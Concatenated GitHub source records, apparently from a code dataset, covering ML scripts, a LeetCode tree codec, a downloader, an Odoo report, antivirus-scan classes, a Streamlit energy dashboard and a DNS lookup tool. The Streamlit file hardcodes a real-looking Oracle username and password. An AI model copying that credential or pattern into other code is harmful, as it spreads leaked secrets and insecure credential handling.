4096)\",\n )\n parser.add_argument(\n \"--test_batch_size\",\n type=int,\n default=10000,\n metavar=\"N\",\n help=\"input batch size for testing (default: 10000)\",\n )\n parser.add_argument(\n \"--lr\",\n type=float,\n default=0.005,\n metavar=\"LR\",\n help=\"learning rate (default: 0.005)\",\n )\n parser.add_argument(\n \"--n_iter\",\n type=int,\n default=80000,\n metavar=\"N\",\n help=\"number of iteration to train (default: 80000)\",\n )\n parser.add_argument(\n \"--record_freq\",\n type=int,\n default=1000,\n metavar=\"N\",\n help=\"recording frequency (default: 1000)\",\n )\n parser.add_argument(\n \"--n_layer\",\n type=int,\n default=1,\n metavar=\"N\",\n help=\"number of MLP layer (default: 1)\",\n )\n parser.add_argument(\n \"--n_hidden\",\n type=int,\n default=200,\n metavar=\"N\",\n help=\"number of hidden neuron (default: 200)\",\n )\n parser.add_argument(\n \"--no_cuda\", action=\"store_true\", default=False, help=\"disables CUDA training\"\n )\n parser.add_argument(\n \"--seed\", type=int, default=0, metavar=\"S\", help=\"random seed (default: 0)\"\n )\n\n opt = parser.parse_args()\n use_cuda = not opt.no_cuda and torch.cuda.is_available()\n opt.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n main(opt)\n","repo_name":"kdkyum/odd_neep","sub_path":"main_ubs.py","file_name":"main_ubs.py","file_ext":"py","file_size_in_byte":10304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565489794","text":"'''\n\nDescription:\n\nSerialization is the process of converting a data structure or object into 
a sequence of bits so that it can be stored in a file or memory buffer, or transmitted across a network connection link to be reconstructed later in the same or another computer environment.\n\nDesign an algorithm to serialize and deserialize a binary tree. There is no restriction on how your serialization/deserialization algorithm should work. You just need to ensure that a binary tree can be serialized to a string and this string can be deserialized to the original tree structure.\n\nExample: \n\nYou may serialize the following tree:\n\n 1\n / \\\n 2 3\n / \\\n 4 5\n\nas \"[1,2,3,null,null,4,5]\"\nClarification: The above format is the same as how LeetCode serializes a binary tree. You do not necessarily need to follow this format, so please be creative and come up with different approaches yourself.\n\nNote: Do not use class member/global/static variables to store states. Your serialize and deserialize algorithms should be stateless.\n\n'''\n\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nfrom collections import deque\n\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n \n path_of_preorder = []\n \n def encoder( node: TreeNode):\n \n if node:\n \n path_of_preorder.append( node.val )\n \n encoder( node.left )\n encoder( node.right )\n\n else:\n \n path_of_preorder.append( '3.14' )\n \n # ------------------------------------------------\n encoder( root )\n \n codec = '#'.join( map( str, path_of_preorder ) )\n \n return codec\n \n\n \n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n \n path_of_preorder = deque( float(value) for value in data.split('#') )\n \n def decoder():\n \n if path_of_preorder:\n \n value = path_of_preorder.popleft()\n \n if value != 3.14:\n \n cur_node = TreeNode( int(value) )\n\n cur_node.left = decoder()\n cur_node.right = decoder()\n \n return cur_node\n \n else:\n \n return None\n # -----------------------------------\n return decoder()\n\n\n\n# n : the number of node in binary tree\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of preorder traversal, which is of O( n ).\n\n## Space Complexity: O( n )\n#\n# The overhead in space is the cost of recursion call stack, which is of O( n ).\n\n\ndef in_order( node ):\n\n if node:\n\n in_order( node.left )\n print( node.val, end = ' ')\n in_order( node.right )\n\n\ndef test_bench():\n\n root_1 = TreeNode( 1 )\n \n root_1.left = TreeNode( 2 )\n root_1.right = TreeNode( 3 )\n\n root_1.right.left = TreeNode( 4 )\n root_1.right.right = TreeNode( 5 )\n\n\n # expected output:\n '''\n before :\n 2 1 4 3 5\n after :\n 2 1 4 3 5\n '''\n\n # Before serialization and deserialization:\n print(\" before : \")\n in_order( root_1 )\n \n serialization = Codec().serialize( root_1 ) \n root_of_tree = Codec().deserialize( serialization )\n print(\"\\n after : \")\n # After serialization and deserialization:\n in_order( root_of_tree )\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_0297_Serialize and Deserialize Binary Tree/by_preorder.py","file_name":"by_preorder.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"72449929794","text":"from config import videos_urls\nimport 
requests\n\nfor video_url in videos_urls:\n    r = requests.get(video_url, stream=True)\n    file_name = r.headers.get('Content-Disposition').split(\"inline; filename=\\\"\")[1][:-1]\n    total_size = r.headers.get('content-length')\n    print(file_name)\n    with open(file_name, 'wb') as f:\n        downloaded_chunks = 0\n        for chunk in r.iter_content(chunk_size=1024 * 1024):\n            if chunk:\n                f.write(chunk)\n                downloaded_chunks += len(chunk)\n                print(end='\\r')\n                print(f'{int((downloaded_chunks / int(total_size)) * 100)}%', end='')\n    print(end='\\r')\n    print(\"Downloaded\")","repo_name":"code-with-me1312/Download-files-from-web","sub_path":"downloadVideos.py","file_name":"downloadVideos.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10476228114","text":"#!/usr/bin/env python\n\nimport os, django\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"Collecster.settings\")\ndjango.setup()\n\nimport json\n\nfrom advideogame.configuration import ConfigNature\n\nnature_dict = {}\nfor nature in ConfigNature.DATA:\n    print (\"Nature: {}\".format(nature))\n    nature_dict[nature] = [\"ConceptSpecific.{}\".format(Specific.__name__) for Specific in ConfigNature.get_concept_specifics((nature,))]\n\nwith open(\"concept_specifics_table.py\", \"w\") as f:\n    f.write(\"concept_specifics_table = {}\".format(json.dumps(nature_dict, sort_keys=True, indent=4)))\n","repo_name":"Adnn/Collecster_OLD","sub_path":"collecster_import_v1/dumpers/list_target_specific.py","file_name":"list_target_specific.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2347919609","text":"# -*- coding: utf-8 -*-\n\ndef main():\n    n=int(input(\"Please enter a positive integer: \"))\n    cut=0\n    ls=[]\n    while(n):\n        x=n%10\n        ls.append(x)\n        n//=10\n        cut+=1\n    ls=ls[::-1]\n    print((ls,cut))\n\nif __name__==\"__main__\":\n    main()","repo_name":"fibonacciyys/mypy","sub_path":"pylearn/example_100/29.py","file_name":"29.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12995582579","text":"import argparse\nimport json\nimport sys\nimport random\nimport os\nimport torch\nimport ftfy\nimport re\nfrom datasets import load_dataset\nfrom tqdm import tqdm\nfrom tqdm.contrib import tenumerate\nfrom transformers import AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig\n\ntorch.backends.cuda.matmul.allow_tf32 = True\n\n\nclass StorySummarizer():\n    _SUMMARY_PROMPT = \"\\n\\n### SUMMARY:\\n\"\n    _ANALYSIS_PROMPT = \"\\n\\n### ANALYSIS:\\n\"\n\n    def __init__(self, model_name_or_path, penalty_alpha, top_k, max_new_tokens, load_in_4bit):\n        self.tokenizer = AutoTokenizer.from_pretrained(model_name_or_path)\n\n        nf4_config = BitsAndBytesConfig(\n            load_in_4bit=True,\n            bnb_4bit_quant_type=\"nf4\",\n            bnb_4bit_use_double_quant=True,\n            bnb_4bit_compute_dtype=torch.bfloat16\n        )\n\n        self.model = AutoModelForCausalLM.from_pretrained(\n            model_name_or_path, trust_remote_code=True,\n            torch_dtype=None if load_in_4bit else torch.bfloat16,\n            quantization_config=nf4_config if load_in_4bit else None, device_map=\"auto\"\n        )\n\n        self._inference_params = {\n            \"penalty_alpha\": penalty_alpha,\n            \"top_k\": top_k,\n            \"max_new_tokens\": max_new_tokens,\n            \"eos_token_id\": self.tokenizer.eos_token_id,\n            \"pad_token_id\": self.tokenizer.eos_token_id,\n        }\n\n    def set_inference_params(self, params):\n        if \"max_length\" in 
params:\n params[\"max_new_tokens\"] = params[\"max_length\"]\n del params[\"max_length\"]\n self._inference_params.update(params)\n\n def summarize(self, input_text):\n return self._run(input_text, self._SUMMARY_PROMPT)\n\n def analyze(self, input_text):\n return self._run(input_text, self._ANALYSIS_PROMPT)\n\n def _run(self, input_text, prompt):\n input_text += prompt\n input_ids = self.tokenizer(\n input_text, return_tensors=\"pt\").input_ids.to(\"cuda\")\n outputs = self.model.generate(input_ids, **self._inference_params)\n answer = self.tokenizer.decode(outputs[0], skip_special_tokens=True)\n loc = answer.find(prompt)\n answer = answer[loc + len(prompt):]\n return answer\n\n# from https://github.com/neonbjb/tortoise-tts/blob/main/tortoise/utils/text.py\n\n\ndef split_and_recombine_text(text, desired_length=200, max_length=300):\n \"\"\"Split text it into chunks of a desired length trying to keep sentences intact.\"\"\"\n # normalize text, remove redundant whitespace and convert non-ascii quotes to ascii\n text = re.sub(r'\\n\\n+', '\\n', text)\n text = re.sub(r'\\s+', ' ', text)\n text = re.sub(r'[“”]', '\"', text)\n\n rv = []\n in_quote = False\n current = \"\"\n split_pos = []\n pos = -1\n end_pos = len(text) - 1\n\n def seek(delta):\n nonlocal pos, in_quote, current\n is_neg = delta < 0\n for _ in range(abs(delta)):\n if is_neg:\n pos -= 1\n current = current[:-1]\n else:\n pos += 1\n current += text[pos]\n if text[pos] == '\"':\n in_quote = not in_quote\n return text[pos]\n\n def peek(delta):\n p = pos + delta\n return text[p] if p < end_pos and p >= 0 else \"\"\n\n def commit():\n nonlocal rv, current, split_pos\n rv.append(current)\n current = \"\"\n split_pos = []\n\n while pos < end_pos:\n c = seek(1)\n # do we need to force a split?\n if len(current) >= max_length:\n if len(split_pos) > 0 and len(current) > (desired_length / 2):\n # we have at least one sentence and we are over half the desired length, seek back to the last split\n d = pos - split_pos[-1]\n seek(-d)\n else:\n # no full sentences, seek back until we are not in the middle of a word and split there\n while c not in '!?.\\n ' and pos > 0 and len(current) > desired_length:\n c = seek(-1)\n commit()\n # check for sentence boundaries\n elif not in_quote and (c in '!?\\n' or (c == '.' 
and peek(1) in '\\n ')):\n # seek forward if we have consecutive boundary markers but still within the max length\n while pos < len(text) - 1 and len(current) < max_length and peek(1) in '!?.':\n c = seek(1)\n split_pos.append(pos)\n if len(current) >= desired_length:\n commit()\n # treat end of quote as a boundary if its followed by a space or newline\n elif in_quote and peek(1) == '\"' and peek(2) in '\\n ':\n seek(2)\n split_pos.append(pos)\n rv.append(current)\n\n # clean up, remove lines with only whitespace or punctuation\n rv = [s.strip() for s in rv]\n rv = [s for s in rv if len(s) > 0 and not re.match(r'^[\\s\\.,;:!?]*$', s)]\n\n return rv\n\n\ndef main(args):\n dataset = load_dataset(args.dataset)[\"train\"]\n\n ids = dataset[\"id\"]\n\n if args.chunks > 1:\n if args.validation_split != 0 or args.test_split != 0:\n print(\"Note, validation/test splits will not be chunked\")\n\n index = {id: index for (index, id) in enumerate(ids)}\n\n if args.shard is not None:\n parts = args.shard.split(\",\")\n this_shard = int(parts[0])\n num_shards = int(parts[1])\n assert args.chunks == 1\n assert num_shards > 1\n assert this_shard >= 0 and this_shard < num_shards\n\n ids = [ids[i]\n for i in range(0, len(ids)) if (i % num_shards) == this_shard]\n\n tokenizer = AutoTokenizer.from_pretrained(\n args.stats_for_tokenizer) if args.stats_for_tokenizer is not None else None\n tokenizer_stats = {\n \"num_text_tokens\": [],\n \"num_summary_tokens\": [],\n \"num_text_and_summary_tokens\": []\n }\n\n summarizer = StorySummarizer(\n args.summarizer, args.penalty_alpha, args.top_k, args.summary_max_tokens, args.load_in_4bit) if not args.no_summary else None\n\n data = []\n for id in tqdm(ids, desc=\"Books\"):\n\n i = index[id]\n entry = dataset[i]\n title: str = entry[\"title\"]\n author: str = entry[\"author\"]\n utf8: str = entry[\"utf8\"]\n\n if not args.no_ftfy:\n utf8 = ftfy.fix_text(utf8)\n\n passages = split_and_recombine_text(\n utf8, args.passage_desired_len, args.passage_max_len)\n\n for i, passage in tenumerate(passages, desc=f\"Passages (Title=\\\"{title}\\\", Author=\\\"{author}\\\")\", leave=False):\n\n summary = summarizer.summarize(passage).strip().replace(\"\\n\", \"\") if not args.no_summary else \"\"\n\n if tokenizer is not None:\n text_tokens = len(tokenizer.encode(\n passage, add_special_tokens=False))\n summary_tokens = len(tokenizer.encode(\n summary, add_special_tokens=False))\n tokenizer_stats[\"num_text_tokens\"].append(text_tokens)\n tokenizer_stats[\"num_summary_tokens\"].append(summary_tokens)\n tokenizer_stats[\"num_text_and_summary_tokens\"].append(\n text_tokens + summary_tokens)\n \n data.append(json.dumps({\n \"passage\": passage,\n \"summary\": summary,\n \"title\": title,\n \"author\": author,\n \"id\": id,\n \"passage_index\": i\n }))\n\n validation_size = int(len(data) * args.validation_split)\n test_size = int(len(data) * args.test_split)\n\n validation = data[0:validation_size]\n test = data[validation_size: test_size + validation_size]\n train = data[test_size + validation_size:]\n\n print(f\"# Train: {len(train)}\")\n if validation_size > 0:\n print(f\"# Valid: {validation_size}\")\n if test_size > 0:\n print(f\"# Valid: {test_size}\")\n\n output_name = f\"{args.dataset.split('/')[1]}-summarized\"\n\n output_dir = os.path.join(args.output_dir, output_name, \"data\")\n os.makedirs(output_dir, exist_ok=True)\n\n shard_suffix = f\"-{this_shard+1:05}\" if args.shard is not None else \"\"\n if args.chunks <= 1:\n open(os.path.join(output_dir, 
f\"train{shard_suffix}.jsonl\"),\n \"w\", encoding=\"utf-8\").writelines(train)\n else:\n chunk_size = int(len(train) / args.chunks)\n if (len(train) % args.chunks) != 0:\n chunk_size += 1\n train = [train[i:i + chunk_size]\n for i in range(0, len(train), chunk_size)]\n for i in range(0, len(train)):\n open(os.path.join(output_dir, f\"train-{i+1:05}.jsonl\"),\n \"w\", encoding=\"utf-8\").writelines(train[i])\n if len(validation) > 0:\n open(os.path.join(output_dir, f\"valid{shard_suffix}.jsonl\"),\n \"w\", encoding=\"utf-8\").writelines(validation)\n if len(test) > 0:\n open(os.path.join(output_dir, f\"test{shard_suffix}.jsonl\"),\n \"w\", encoding=\"utf-8\").writelines(test)\n\n if tokenizer is not None:\n import numpy\n for key, value in tokenizer_stats.items():\n print(f\"{key}: min: {numpy.min(value)} max: {numpy.max(value)} avg: {int(numpy.average(value))} med: {int(numpy.median(value))} total: {numpy.sum(value)}\")\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset\", type=str)\n\n parser.add_argument(\"--stats_for_tokenizer\", type=str)\n parser.add_argument(\"--stats_only\", type=str)\n\n parser.add_argument(\"--summarizer\", type=str,\n default=\"emozilla/mpt-7b-storysummarizer\")\n parser.add_argument(\"--penalty_alpha\", type=float, default=0.6)\n parser.add_argument(\"--top_k\", type=int, default=4)\n parser.add_argument(\"--load_in_4bit\", action=\"store_true\")\n parser.add_argument(\"--summary_max_tokens\", type=int, default=128)\n parser.add_argument(\"--no_summary\", action=\"store_true\")\n\n parser.add_argument(\"--no_ftfy\", action=\"store_true\")\n parser.add_argument(\"--passage_desired_len\", type=int, default=1500)\n parser.add_argument(\"--passage_max_len\", type=int, default=2000)\n\n parser.add_argument(\"--output_dir\", type=str, default=\"outputs\")\n parser.add_argument(\"--validation_split\", type=float, default=0)\n parser.add_argument(\"--test_split\", type=float, default=0)\n parser.add_argument(\"--chunks\", type=int, default=1)\n parser.add_argument(\"--shard\", type=str)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n sys.exit(main(parse_args()))\n","repo_name":"jquesnelle/ghostwriter","sub_path":"create-summary-dataset.py","file_name":"create-summary-dataset.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70911887553","text":"from odoo.osv import osv\nfrom odoo.report import report_sxw\nfrom datetime import datetime\n\n\nclass AccountAssetDetails(report_sxw.rml_parse):\n\n def __init__(self, cr, uid, name, context):\n super(AccountAssetDetails, self).__init__(cr, uid, name, context=context)\n\n self.localcontext.update({\n 'get_details': self.get_details,\n\n })\n self.context = context\n\n def format_date(self, date):\n date_dt = datetime.strptime(date, '%Y-%m-%d')\n return date_dt.strftime(\"%d\").upper()+\" \"+date_dt.strftime(\"%b\").upper()+\", \"+str(date_dt.year)\n\n def get_details(self, asset_id):\n result = {\n 'image': asset_id.image,\n 'name': asset_id.name,\n 'sys_no': asset_id.sys_no,\n 'code': asset_id.code,\n 'serial_no': asset_id.serial_no,\n 'vendor': asset_id.vendor,\n 'depreciation_base': asset_id.depreciation_base,\n 'value_residual': asset_id.value_residual,\n 'purchase_value': asset_id.purchase_value,\n 'salvage_value': asset_id.salvage_value,\n 'acquired_date': self.format_date(asset_id.acquired_date),\n 'date_start': self.format_date(asset_id.date_start),\n 
'profile': asset_id.profile_id.name,\n 'sub_category': asset_id.sub_category_id.name,\n 'location': asset_id.location_id.name,\n 'asset_department': asset_id.asset_department_id.name,\n 'asset_unit': asset_id.asset_unit_id.name,\n 'partner': asset_id.partner_id.name,\n 'method_number': asset_id.method_number,\n 'method_number_month': asset_id.method_number_month,\n 'asset_gl_account': asset_id.asset_gl_account_id.code,\n 'depreciation_expense_account': asset_id.depreciation_expense_account_id.code,\n 'accumulated_depreciation_account': asset_id.accumulated_depreciation_account_id.code,\n }\n\n return result\n\n\nclass WrappedReportAureolNassitReport(osv.AbstractModel):\n _name = 'report.account_asset_management.asset_details_report_template'\n _inherit = 'report.abstract_report'\n _template = 'account_asset_management.asset_details_report_template'\n _wrapped_report_class = AccountAssetDetails\n","repo_name":"Jacky-odoo/Ecobank","sub_path":"custom/asset/account_asset_management/report/asset_details_report.py","file_name":"asset_details_report.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28207941523","text":"\"\"\" This module contains the classes related to the outcome of a scan \"\"\"\nfrom ..plugin import Plugin\nfrom uuid import uuid4\nimport json\n\nclass Scan():\n def __init__(self, sample, scanner, uuid=None, pending=False, scan_id=None, scan_results=[]):\n self.pending = pending\n self.sample = sample\n self.uuid = uuid if uuid is not None else uuid4() # uuid for scan\n self.scanner = scanner\n self.scan_results = scan_results\n self.scan_id = scan_id # unique id to retrieve from scanner\n\n def put(self):\n return self.project.db.put_scan(self)\n\n def add_result(self, scan_result):\n self.scan_results.append(scan_result)\n self.project.db.put_scan_result(self, scan_result)\n\n def __str__(self):\n return str(self.uuid)\n\n def to_dict(scan):\n return {'pending': scan.pending,\n 'sample': scan.sample.sha256,\n 'scanner': scan.scanner,\n 'scan_id': scan.scan_id,\n 'uuid': scan.uuid,\n 'scan_results': [s.uuid for s in scan.scan_results]}\n\nclass ScanResult():\n \"\"\" this class represents a single scan for an AV, on a specific sample, at a given time, extra must be serializable...\"\"\"\n\n def __init__(self, sample, scanner, scan, av, label, update, version, uuid=None):\n self.uuid = uuid if uuid else uuid4()\n self.scan = scan\n self.scanner = scanner\n self.label = label\n self.sample = sample\n self.av = av\n","repo_name":"necst/crave","sub_path":"crave/scanner/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"61"} +{"seq_id":"41179320585","text":"# imports\r\nimport streamlit as st\r\nimport cx_Oracle\r\nfrom Energy_reliability import *\r\nfrom Energy_CO2 import *\r\nfrom Energy_fuel import *\r\nfrom Energy_sales import *\r\nfrom Energy_reliability import *\r\nfrom PIL import Image\r\n\r\n# vars\r\nstates = [\"\"\"\"\"\", \"\"\"AL\"\"\", \"\"\"AK\"\"\", \"\"\"AZ\"\"\", \"\"\"AR\"\"\", \"\"\"CA\"\"\", \"\"\"CO\"\"\", \"\"\"CT\"\"\", \"\"\"DE\"\"\", \"\"\"FL\"\"\", \"\"\"GA\"\"\",\r\n \"\"\"HI\"\"\", \"\"\"ID\"\"\", \"\"\"IL\"\"\", \"\"\"IN\"\"\", \"\"\"IA\"\"\", \"\"\"KS\"\"\", \"\"\"KY\"\"\", \"\"\"LA\"\"\", \"\"\"ME\"\"\", \"\"\"MD\"\"\", \"\"\"MA\"\"\",\r\n \"\"\"MI\"\"\", \"\"\"MN\"\"\", \"\"\"MS\"\"\", \"\"\"MO\"\"\", \"\"\"MT\"\"\", \"\"\"NE\"\"\", 
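# two-letter abbreviations for the 50 US states; the leading empty string is the blank/default selectbox option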
\"\"\"NV\"\"\", \"\"\"NH\"\"\", \"\"\"NJ\"\"\", \"\"\"NM\"\"\", \"\"\"NY\"\"\",\r\n \"\"\"NC\"\"\", \"\"\"ND\"\"\", \"\"\"OH\"\"\", \"\"\"OK\"\"\", \"\"\"OR\"\"\", \"\"\"PA\"\"\", \"\"\"RI\"\"\", \"\"\"SC\"\"\", \"\"\"SD\"\"\", \"\"\"TN\"\"\", \"\"\"TX\"\"\",\r\n \"\"\"UT\"\"\", \"\"\"VT\"\"\", \"\"\"VA\"\"\", \"\"\"WA\"\"\", \"\"\"WV\"\"\", \"\"\"WI\"\"\", \"\"\"WY\"\"\"]\r\n\r\n# Oracle connection\r\ndsn = cx_Oracle.makedsn(\"oracle.cise.ufl.edu\", 1521, service_name=\"orcl\")\r\nuserpwd = \"ApexLegend2020\"\r\n\r\n#################\r\n# Functions\r\n#################\r\ndef getFuelTrendCall():\r\n # initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n fuelTypes = st.multiselect('Select Fuel Type',\r\n ('Solar', 'Geothermal', 'Coal', 'Natural Gas', 'Nuclear', 'Wind'), 'Solar')\r\n # if st.button('Get Fuel Trends'):\r\n st.subheader('Number of Utilities that use a Given Fuel Exclusively')\r\n if len(fuelTypes) >= 1:\r\n (chart, query) = getFuelTrend(connection, fuelTypes)\r\n st.altair_chart(chart)\r\n st.code(query, language='sql')\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\ndef displayCO2Call():\r\n #initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n st.subheader('Best/Worst CO2 Emissions Net Change')\r\n # QUERY FOR CO2 for five best and five worst over one year\r\n display_order = st.selectbox(\"\", ('Five best states', 'Five worst states'))\r\n if display_order == 'Five best states':\r\n setChart = \"\"\"asc\"\"\"\r\n elif display_order == 'Five worst states':\r\n setChart = \"\"\"desc\"\"\"\r\n\r\n year_select = st.selectbox('Comparison- Year Start:', ('2013', '2014', '2015', '2016', '2017'))\r\n year_select2 = st.selectbox('Comparison- Year End:', ('2014', '2015', '2016', '2017', '2018'))\r\n # show all years\r\n chartone = displayCO2(connection, setChart, int(year_select),int(year_select2), True)\r\n # show time selected\r\n charttwo = displayCO2(connection, setChart, int(year_select),int(year_select2), False)\r\n st.altair_chart(chartone)\r\n st.altair_chart(charttwo)\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\ndef displayCO2byStateCall():\r\n # initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n st.subheader('State CO2 Emissions Comparison Tool')\r\n # QUERY FOR CO2 by state\r\n\r\n st.markdown('**Select Year Range**')\r\n stateCO2_start_year = st.selectbox('Start Year', ('2013', '2014', '2015', '2016', '2017'))\r\n stateCO2_end_year = st.selectbox('End Year', ('2014', '2015', '2016', '2017', '2018'), 4)\r\n st.markdown('**Select States to Compare**')\r\n stateCO2_state1 = st.selectbox('State 1', states, 1)\r\n stateCO2_state2 = st.selectbox('State 2', states)\r\n stateCO2_state3 = st.selectbox('State 3', states)\r\n stateCO2_state4 = st.selectbox('State 4', states)\r\n stateCO2_state5 = st.selectbox('State 5', states)\r\n\r\n chartone = displayCO2byState(connection, stateCO2_start_year, stateCO2_end_year,\r\n stateCO2_state1, stateCO2_state2, stateCO2_state3,\r\n stateCO2_state4, stateCO2_state5)\r\n\r\n charttwo = displayNormalizedCO2(connection, stateCO2_start_year, stateCO2_end_year,\r\n stateCO2_state1, stateCO2_state2, stateCO2_state3,\r\n stateCO2_state4, stateCO2_state5)\r\n\r\n\r\n st.markdown('**Gross Tons CO2 Produced**')\r\n st.altair_chart(chartone)\r\n st.markdown('**Normalized Lbs CO2 Produced**')\r\n st.altair_chart(charttwo)\r\n\r\n map_year = 
st.selectbox('Select Year for CO2 Map', ('2013', '2014', '2015', '2016', '2017', '2018'))\r\n st.markdown('**Normalized Lbs CO2 Produced Choropleth Map**')\r\n chartthree = makeMeAFreakingMap(connection, map_year)\r\n st.altair_chart(chartthree)\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\ndef displayReliabilityCall():\r\n # initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n st.subheader('Outage Trends (With and Without Major Events)')\r\n chart = displayReliability(connection)\r\n st.altair_chart(chart)\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\ndef displaySalesCall():\r\n # initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n st.subheader('Residential Power Revenue per County')\r\n chart = displaySales(connection)\r\n st.altair_chart(chart)\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\n#######################\r\n# Sidebar menu#\r\n#######################\r\n# imports\r\n\r\n# Streamlit Display\r\nst.title = 'Energy Industry'\r\nimage = Image.open('database_project_banner.jpg')\r\nst.image(image, use_column_width=True)\r\n\r\n# functions\r\nfunctionDict = {\r\n 'Fuel Utilization': getFuelTrendCall,\r\n 'CO2 Change': displayCO2Call,\r\n 'CO2 State Comparison': displayCO2byStateCall,\r\n 'Grid Reliability': displayReliabilityCall,\r\n 'Sales': displaySalesCall\r\n}\r\nmenu = st.sidebar.radio('Pick a topic', ('Fuel Utilization', 'CO2 Change', 'CO2 State Comparison', 'Grid Reliability','Sales'))\r\n\r\nfunctionCall = functionDict[menu]\r\nfunctionCall()\r\n","repo_name":"mindcodemediator/Database_Energy_Project","sub_path":"Energy_Industry.py","file_name":"Energy_Industry.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24602615156","text":"#!/usr/bin/env python\n\"\"\"Gets the IP for a given hostname.\"\"\"\n\nimport sys\nimport argparse\nimport socket\n# ==============================================================================\n__version__ = \"0.1\"\n\n__copyright__ = \"Copyright 2017, devops.center\"\n__credits__ = [\"Bob Lozano\", \"Gregg Jensen\"]\n__license__ = ' \\\n # Copyright 2014-2017 devops.center llc \\\n # \\\n # Licensed under the Apache License, Version 2.0 (the \"License\"); \\\n # you may not use this file except in compliance with the License. \\\n # You may obtain a copy of the License at \\\n # \\\n # http://www.apache.org/licenses/LICENSE-2.0 \\\n # \\\n # Unless required by applicable law or agreed to in writing, software \\\n # distributed under the License is distributed on an \"AS IS\" BASIS, \\\n # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. \\\n # See the License for the specific language governing permissions and \\\n # limitations under the License. 
\\\n # '\n__status__ = \"Development\"\n# ==============================================================================\n\n\ndef checkArgs():\n \"\"\"Check the command line arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description=('Gets the IP for the given hostname'))\n parser.add_argument('-n', '--nameOfHost', help='The fully qualified '\n 'name and domain of the host that you want the '\n 'IP for.',\n required=True)\n\n args = parser.parse_args()\n\n retHostname = None\n if args.nameOfHost:\n retHostname = args.nameOfHost\n\n return(retHostname)\n\n\ndef main(argv):\n \"\"\"Main code goes here.\"\"\"\n theHostname = checkArgs()\n\n try:\n ipReturned = socket.gethostbyname(theHostname)\n print(ipReturned)\n except socket.gaierror:\n print(\"ERROR\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4\n","repo_name":"devopscenter/dcUtils","sub_path":"checkDNSforIP.py","file_name":"checkDNSforIP.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9106103509","text":"import tensorflow as tf\n\n\ndef distance_from_prob(y_true, y_pred):\n \"\"\"Get keypoint distance from heatmap probability.\n \"\"\"\n height, width = y_pred.get_shape()[1:3]\n\n index_map_x = tf.range(width, dtype=y_true.dtype)\n index_map_x = tf.reshape(index_map_x, (1, 1, -1, 1))\n index_map_y = tf.range(height, dtype=y_true.dtype)\n index_map_y = tf.reshape(index_map_y, (1, -1, 1, 1))\n\n y_true_map_x = y_true*index_map_x\n y_true_map_y = y_true*index_map_y\n y_pred_map_x = y_pred*index_map_x\n y_pred_map_y = y_pred*index_map_y\n\n y_true_x = tf.reduce_sum(y_true_map_x, axis=(1, 2))\n y_true_y = tf.reduce_sum(y_true_map_y, axis=(1, 2))\n y_pred_x = tf.reduce_sum(y_pred_map_x, axis=(1, 2))\n y_pred_y = tf.reduce_sum(y_pred_map_y, axis=(1, 2))\n\n dist = tf.math.sqrt(\n (y_true_x - y_pred_x)**2 + (y_true_y - y_pred_y)**2)\n\n dist = tf.reduce_mean(dist, axis=-1)\n\n return dist\n","repo_name":"samson6460/tf2_pose_estimation","sub_path":"metrics/distance_metrics.py","file_name":"distance_metrics.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"26088068065","text":"# Definition for 